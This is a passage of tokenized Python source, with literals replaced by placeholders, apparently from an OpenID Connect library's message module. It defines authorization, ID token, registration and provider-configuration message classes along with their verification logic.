OPTIONAL_LIST_OF_STRINGS <EOL> from oic . oauth2 . message import SINGLE_REQUIRED_STRING <EOL> from oic . oauth2 . message import OPTIONAL_LIST_OF_SP_SEP_STRINGS <EOL> from oic . oauth2 . message import SINGLE_OPTIONAL_INT <EOL> from oic . oauth2 . message import REQUIRED_LIST_OF_STRINGS <EOL> __author__ = '<STR_LIT>' <EOL> logger = logging . getLogger ( __name__ ) <EOL> NONCE_STORAGE_TIME = <NUM_LIT:4> * <NUM_LIT> <EOL> class AtHashError ( VerificationError ) : <EOL> pass <EOL> class CHashError ( VerificationError ) : <EOL> pass <EOL> class EXPError ( VerificationError ) : <EOL> pass <EOL> class IATError ( VerificationError ) : <EOL> pass <EOL> def json_ser ( val , sformat = None , lev = <NUM_LIT:0> ) : <EOL> return json . dumps ( val ) <EOL> def json_deser ( val , sformat = None , lev = <NUM_LIT:0> ) : <EOL> return json . loads ( val ) <EOL> def json_conv ( val , sformat = None , lev = <NUM_LIT:0> ) : <EOL> if isinstance ( val , dict ) : <EOL> for key , _val in val . items ( ) : <EOL> if _val is None : <EOL> val [ key ] = "<STR_LIT:none>" <EOL> elif _val is True : <EOL> val [ key ] = "<STR_LIT:true>" <EOL> elif _val is False : <EOL> val [ key ] = "<STR_LIT:false>" <EOL> return val <EOL> def json_rest ( val , sformat = None , lev = <NUM_LIT:0> ) : <EOL> if isinstance ( val , dict ) : <EOL> for key , _val in val . items ( ) : <EOL> if _val == "<STR_LIT:none>" : <EOL> val [ key ] = None <EOL> elif _val == "<STR_LIT:true>" : <EOL> val [ key ] = True <EOL> elif _val == "<STR_LIT:false>" : <EOL> val [ key ] = False <EOL> return val <EOL> SINGLE_OPTIONAL_BOOLEAN = ( bool , False , None , None , False ) <EOL> SINGLE_OPTIONAL_JSON_WN = ( dict , False , json_ser , json_deser , True ) <EOL> SINGLE_OPTIONAL_JSON_CONV = ( dict , False , json_conv , json_rest , True ) <EOL> SINGLE_REQUIRED_INT = ( int , True , None , None , False ) <EOL> def idtoken_deser ( val , sformat = "<STR_LIT>" ) : <EOL> return IdToken ( ) . deserialize ( val , "<STR_LIT>" ) <EOL> def address_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> elif sformat == "<STR_LIT>" : <EOL> sformat = "<STR_LIT>" <EOL> return AddressClaim ( ) . deserialize ( val , sformat ) <EOL> def claims_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return Claims ( ) . deserialize ( val , sformat ) <EOL> def message_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return Message ( ) . deserialize ( val , sformat ) <EOL> def msg_ser ( inst , sformat , lev = <NUM_LIT:0> ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if isinstance ( inst , dict ) or isinstance ( inst , Message ) : <EOL> res = inst . serialize ( sformat , lev ) <EOL> else : <EOL> res = inst <EOL> elif sformat == "<STR_LIT>" : <EOL> if isinstance ( inst , Message ) : <EOL> res = inst . serialize ( sformat , lev ) <EOL> elif isinstance ( inst , dict ) : <EOL> res = inst <EOL> elif isinstance ( inst , six . string_types ) : <EOL> res = inst <EOL> else : <EOL> raise MessageException ( "<STR_LIT>" % type ( inst ) ) <EOL> else : <EOL> raise PyoidcError ( "<STR_LIT>" , inst ) <EOL> return res <EOL> def msg_ser_json ( inst , sformat = "<STR_LIT>" , lev = <NUM_LIT:0> ) : <EOL> if lev : <EOL> sformat = "<STR_LIT>" <EOL> if sformat == "<STR_LIT>" : <EOL> if isinstance ( inst , Message ) : <EOL> res = inst . serialize ( sformat , lev ) <EOL> elif isinstance ( inst , dict ) : <EOL> res = inst <EOL> else : <EOL> raise MessageException ( "<STR_LIT>" % type ( inst ) ) <EOL> else : <EOL> sformat = "<STR_LIT>" <EOL> if isinstance ( inst , dict ) or isinstance ( inst , Message ) : <EOL> res = inst . serialize ( sformat , lev ) <EOL> else : <EOL> res = inst <EOL> return res <EOL> def msg_list_ser ( insts , sformat , lev = <NUM_LIT:0> ) : <EOL> return [ msg_ser ( inst , sformat , lev ) for inst in insts ] <EOL> def claims_ser ( val , sformat = "<STR_LIT>" , lev = <NUM_LIT:0> ) : <EOL> if isinstance ( val , six . string_types ) : <EOL> item = val <EOL> elif isinstance ( val , list ) : <EOL> item = val [ <NUM_LIT:0> ] <EOL> else : <EOL> item = val <EOL> if isinstance ( item , Message ) : <EOL> return item . serialize ( method = sformat , lev = lev + <NUM_LIT:1> ) <EOL> if sformat == "<STR_LIT>" : <EOL> res = urllib . urlencode ( item ) <EOL> elif sformat == "<STR_LIT>" : <EOL> if lev : <EOL> res = item <EOL> else : <EOL> res = json . dumps ( item ) <EOL> elif sformat == "<STR_LIT>" : <EOL> if isinstance ( item , dict ) : <EOL> res = item <EOL> else : <EOL> raise MessageException ( "<STR_LIT>" % type ( item ) ) <EOL> else : <EOL> raise PyoidcError ( "<STR_LIT>" % sformat , val ) <EOL> return res <EOL> def registration_request_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return RegistrationRequest ( ) . deserialize ( val , sformat ) <EOL> def claims_request_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat == "<STR_LIT>" : <EOL> sformat = "<STR_LIT>" <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return ClaimsRequest ( ) . deserialize ( val , sformat ) <EOL> OPTIONAL_ADDRESS = ( Message , False , msg_ser , address_deser , False ) <EOL> OPTIONAL_LOGICAL = ( bool , False , None , None , False ) <EOL> OPTIONAL_MULTIPLE_Claims = ( Message , False , claims_ser , claims_deser , False ) <EOL> SINGLE_OPTIONAL_IDTOKEN = ( six . string_types , False , msg_ser , None , False ) <EOL> SINGLE_OPTIONAL_REGISTRATION_REQUEST = ( Message , False , msg_ser , <EOL> registration_request_deser , False ) <EOL> SINGLE_OPTIONAL_CLAIMSREQ = ( Message , False , msg_ser_json , claims_request_deser , <EOL> False ) <EOL> OPTIONAL_MESSAGE = ( Message , False , msg_ser , message_deser , False ) <EOL> REQUIRED_MESSAGE = ( Message , True , msg_ser , message_deser , False ) <EOL> SCOPE_CHARSET = [ ] <EOL> for char in [ '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> if isinstance ( char , tuple ) : <EOL> c = char [ <NUM_LIT:0> ] <EOL> while c <= char [ <NUM_LIT:1> ] : <EOL> SCOPE_CHARSET . append ( c ) <EOL> c = chr ( ord ( c ) + <NUM_LIT:1> ) <EOL> else : <EOL> SCOPE_CHARSET . append ( set ) <EOL> def check_char_set ( string , allowed ) : <EOL> for c in string : <EOL> if c not in allowed : <EOL> raise NotAllowedValue ( "<STR_LIT>" % c ) <EOL> class RefreshAccessTokenRequest ( message . RefreshAccessTokenRequest ) : <EOL> pass <EOL> class TokenErrorResponse ( message . TokenErrorResponse ) : <EOL> pass <EOL> class AccessTokenResponse ( message . AccessTokenResponse ) : <EOL> c_param = message . AccessTokenResponse . c_param . copy ( ) <EOL> c_param . update ( { "<STR_LIT>" : SINGLE_OPTIONAL_STRING } ) <EOL> def verify ( self , ** kwargs ) : <EOL> super ( AccessTokenResponse , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> args = { } <EOL> for arg in [ "<STR_LIT:key>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> try : <EOL> args [ arg ] = kwargs [ arg ] <EOL> except KeyError : <EOL> pass <EOL> idt = IdToken ( ) . from_jwt ( str ( self [ "<STR_LIT>" ] ) , ** args ) <EOL> if not idt . verify ( ** kwargs ) : <EOL> return False <EOL> self [ "<STR_LIT>" ] = idt <EOL> return True <EOL> class UserInfoRequest ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> } <EOL> class AuthorizationResponse ( message . AuthorizationResponse , <EOL> message . AccessTokenResponse ) : <EOL> c_param = message . AuthorizationResponse . c_param . copy ( ) <EOL> c_param . update ( message . AccessTokenResponse . c_param ) <EOL> c_param . update ( { <EOL> "<STR_LIT:code>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_IDTOKEN , <EOL> } ) <EOL> def verify ( self , ** kwargs ) : <EOL> super ( AuthorizationResponse , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> if "<STR_LIT>" in kwargs : <EOL> if kwargs [ "<STR_LIT>" ] not in self [ "<STR_LIT>" ] : <EOL> return False <EOL> if "<STR_LIT>" in self : <EOL> args = { } <EOL> for arg in [ "<STR_LIT:key>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> try : <EOL> args [ arg ] = kwargs [ arg ] <EOL> except KeyError : <EOL> pass <EOL> idt = IdToken ( ) . from_jwt ( str ( self [ "<STR_LIT>" ] ) , ** args ) <EOL> if not idt . verify ( ** kwargs ) : <EOL> raise VerificationError ( "<STR_LIT>" , idt ) <EOL> _alg = idt . jws_header [ "<STR_LIT>" ] <EOL> hfunc = "<STR_LIT>" + _alg [ - <NUM_LIT:3> : ] <EOL> if "<STR_LIT>" in self : <EOL> try : <EOL> assert "<STR_LIT>" in idt <EOL> except AssertionError : <EOL> raise MissingRequiredAttribute ( "<STR_LIT>" , <EOL> idt ) <EOL> try : <EOL> assert idt [ "<STR_LIT>" ] == jws . left_hash ( <EOL> self [ "<STR_LIT>" ] , hfunc ) <EOL> except AssertionError : <EOL> raise AtHashError ( <EOL> "<STR_LIT>" , idt ) <EOL> if "<STR_LIT:code>" in self : <EOL> try : <EOL> assert "<STR_LIT>" in idt <EOL> except AssertionError : <EOL> raise MissingRequiredAttribute ( "<STR_LIT>" , <EOL> idt ) <EOL> try : <EOL> assert idt [ "<STR_LIT>" ] == jws . left_hash ( self [ "<STR_LIT:code>" ] , hfunc ) <EOL> except AssertionError : <EOL> raise CHashError ( "<STR_LIT>" , idt ) <EOL> self [ "<STR_LIT>" ] = idt <EOL> return True <EOL> class AuthorizationErrorResponse ( message . AuthorizationErrorResponse ) : <EOL> c_allowed_values = message . AuthorizationErrorResponse . c_allowed_values . copy ( ) <EOL> c_allowed_values [ "<STR_LIT:error>" ] . extend ( [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> class AuthorizationRequest ( message . AuthorizationRequest ) : <EOL> c_param = message . AuthorizationRequest . c_param . copy ( ) <EOL> c_param . update ( <EOL> { <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_SP_SEP_STRINGS , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_SP_SEP_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_SP_SEP_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_SP_SEP_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_CLAIMSREQ , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_JSON , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> } <EOL> ) <EOL> c_allowed_values = message . AuthorizationRequest . c_allowed_values . copy ( ) <EOL> c_allowed_values . update ( { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT:none>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> } ) <EOL> def verify ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( AuthorizationRequest , self ) . verify ( ** kwargs ) <EOL> args = { } <EOL> for arg in [ "<STR_LIT:key>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> try : <EOL> args [ arg ] = kwargs [ arg ] <EOL> except KeyError : <EOL> pass <EOL> if "<STR_LIT>" not in kwargs : <EOL> args [ "<STR_LIT>" ] = self [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in self : <EOL> if isinstance ( self [ "<STR_LIT>" ] , six . string_types ) : <EOL> oidr = OpenIDRequest ( ) . from_jwt ( str ( self [ "<STR_LIT>" ] ) , ** args ) <EOL> for key , val in oidr . items ( ) : <EOL> if key in self : <EOL> assert self [ key ] == val <EOL> self [ "<STR_LIT>" ] = oidr <EOL> if "<STR_LIT>" in self : <EOL> if isinstance ( self [ "<STR_LIT>" ] , six . string_types ) : <EOL> idt = IdToken ( ) . from_jwt ( str ( self [ "<STR_LIT>" ] ) , ** args ) <EOL> self [ "<STR_LIT>" ] = idt <EOL> if "<STR_LIT>" not in self : <EOL> raise MissingRequiredAttribute ( "<STR_LIT>" , self ) <EOL> _rt = self [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in _rt or "<STR_LIT>" in _rt : <EOL> if "<STR_LIT>" not in self : <EOL> raise MissingRequiredAttribute ( "<STR_LIT>" , self ) <EOL> if "<STR_LIT>" not in self . get ( "<STR_LIT>" , [ ] ) : <EOL> raise MissingRequiredValue ( "<STR_LIT>" , self ) <EOL> if "<STR_LIT>" in self . get ( "<STR_LIT>" , [ ] ) : <EOL> if "<STR_LIT>" not in self or "<STR_LIT>" not in self [ "<STR_LIT>" ] : <EOL> raise MissingRequiredValue ( "<STR_LIT>" , self ) <EOL> if "<STR_LIT>" in self : <EOL> if "<STR_LIT:none>" in self [ "<STR_LIT>" ] and len ( self [ "<STR_LIT>" ] ) > <NUM_LIT:1> : <EOL> raise InvalidRequest ( "<STR_LIT>" , <EOL> self ) <EOL> return True <EOL> class AccessTokenRequest ( message . AccessTokenRequest ) : <EOL> c_param = message . AccessTokenRequest . c_param . copy ( ) <EOL> c_param . update ( { "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING } ) <EOL> c_default = { "<STR_LIT>" : "<STR_LIT>" } <EOL> c_allowed_values = { <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" ] , <EOL> } <EOL> class AddressClaim ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING } <EOL> class OpenIDSchema ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT:name>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT:email>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT:address>" : OPTIONAL_ADDRESS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : OPTIONAL_MESSAGE , <EOL> "<STR_LIT>" : OPTIONAL_MESSAGE } <EOL> def verify ( self , ** kwargs ) : <EOL> super ( OpenIDSchema , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> try : <EOL> _ = time . strptime ( self [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> except ValueError : <EOL> try : <EOL> _ = time . strptime ( self [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> except ValueError : <EOL> try : <EOL> _ = time . strptime ( self [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> except ValueError : <EOL> raise VerificationError ( "<STR_LIT>" , self ) <EOL> return True <EOL> class RegistrationRequest ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : OPTIONAL_LOGICAL , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> } <EOL> c_default = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : [ "<STR_LIT:code>" ] } <EOL> c_allowed_values = { "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] } <EOL> def verify ( self , ** kwargs ) : <EOL> super ( RegistrationRequest , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> assert self [ "<STR_LIT>" ] . startswith ( "<STR_LIT>" ) <EOL> for param in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if "<STR_LIT>" % param in self : <EOL> if "<STR_LIT>" % param not in self : <EOL> self [ "<STR_LIT>" % param ] = "<STR_LIT>" <EOL> if "<STR_LIT>" % param in self : <EOL> assert "<STR_LIT>" % param in self <EOL> if "<STR_LIT>" in self : <EOL> assert self [ "<STR_LIT>" ] != "<STR_LIT:none>" <EOL> return True <EOL> class RegistrationResponse ( Message ) : <EOL> """<STR_LIT>""" <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> } <EOL> c_param . update ( RegistrationRequest . c_param ) <EOL> def verify ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( RegistrationResponse , self ) . verify ( ** kwargs ) <EOL> has_reg_uri = "<STR_LIT>" in self <EOL> has_reg_at = "<STR_LIT>" in self <EOL> if has_reg_uri != has_reg_at : <EOL> raise VerificationError ( ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , self ) <EOL> return True <EOL> class ClientRegistrationErrorResponse ( message . ErrorResponse ) : <EOL> c_allowed_values = { "<STR_LIT:error>" : [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] } <EOL> class IdToken ( OpenIDSchema ) : <EOL> c_param = OpenIDSchema . c_param . copy ( ) <EOL> c_param . update ( { <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_INT , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING <EOL> } ) <EOL> def verify ( self , ** kwargs ) : <EOL> super ( IdToken , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> if "<STR_LIT>" in kwargs : <EOL> if kwargs [ "<STR_LIT>" ] not in self [ "<STR_LIT>" ] : <EOL> raise NotForMe ( "<STR_LIT>" , self ) <EOL> if len ( self [ "<STR_LIT>" ] ) > <NUM_LIT:1> : <EOL> try : <EOL> assert "<STR_LIT>" in self <EOL> except AssertionError : <EOL> raise VerificationError ( "<STR_LIT>" , self ) <EOL> else : <EOL> try : <EOL> assert self [ "<STR_LIT>" ] in self [ "<STR_LIT>" ] <EOL> except AssertionError : <EOL> raise VerificationError ( <EOL> "<STR_LIT>" , self ) <EOL> if "<STR_LIT>" in self : <EOL> if "<STR_LIT>" in kwargs : <EOL> if kwargs [ "<STR_LIT>" ] != self [ "<STR_LIT>" ] : <EOL> raise NotForMe ( "<STR_LIT>" , self ) <EOL> _now = time_util . utc_time_sans_frac ( ) <EOL> try : <EOL> _skew = kwargs [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> _skew = <NUM_LIT:0> <EOL> try : <EOL> _exp = self [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise MissingRequiredAttribute ( '<STR_LIT>' ) <EOL> else : <EOL> if ( _now - _skew ) > _exp : <EOL> raise EXPError ( '<STR_LIT>' ) <EOL> try : <EOL> _storage_time = kwargs [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> _storage_time = NONCE_STORAGE_TIME <EOL> try : <EOL> _iat = self [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise MissingRequiredAttribute ( '<STR_LIT>' ) <EOL> else : <EOL> if ( _iat + _storage_time ) < ( _now - _skew ) : <EOL> raise IATError ( '<STR_LIT>' ) <EOL> return True <EOL> class RefreshSessionRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT:state>" : SINGLE_REQUIRED_STRING } <EOL> class RefreshSessionResponse ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT:state>" : SINGLE_REQUIRED_STRING } <EOL> class CheckSessionRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING } <EOL> class CheckIDRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING } <EOL> class EndSessionRequest ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING <EOL> } <EOL> class EndSessionResponse ( Message ) : <EOL> c_param = { "<STR_LIT:state>" : SINGLE_REQUIRED_STRING } <EOL> class Claims ( Message ) : <EOL> pass <EOL> class ClaimsRequest ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : OPTIONAL_MULTIPLE_Claims , <EOL> "<STR_LIT>" : OPTIONAL_MULTIPLE_Claims <EOL> } <EOL> class OpenIDRequest ( AuthorizationRequest ) : <EOL> pass <EOL> class ProviderConfigurationResponse ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : <EOL> OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : <EOL> OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : <EOL> OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> } <EOL> c_default = { "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" ] , <EOL> "<STR_LIT>" : 